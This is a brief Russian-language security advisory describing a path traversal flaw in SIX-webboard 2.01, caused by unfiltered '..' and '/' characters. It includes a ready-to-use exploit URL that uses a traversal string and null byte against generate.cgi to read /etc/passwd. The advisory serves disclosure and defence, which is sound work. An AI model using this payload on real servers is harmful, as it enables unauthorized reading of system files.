При обработке пользовательского ввода не фильтруются символы ‘..’ и ‘/’, что позволяет ввести в строке запроса обратный путь к директориям вне Web каталога.

Уязвимость работает в SIX-webboard 2.01.

Эксплоит (выводит содержание /etc/passwd):
http://www.target.net/cgi-bin/webboard/generate.cgi? content=../../../../../../../../../etc/passwd%00
&board=boardsname

Оставить мнение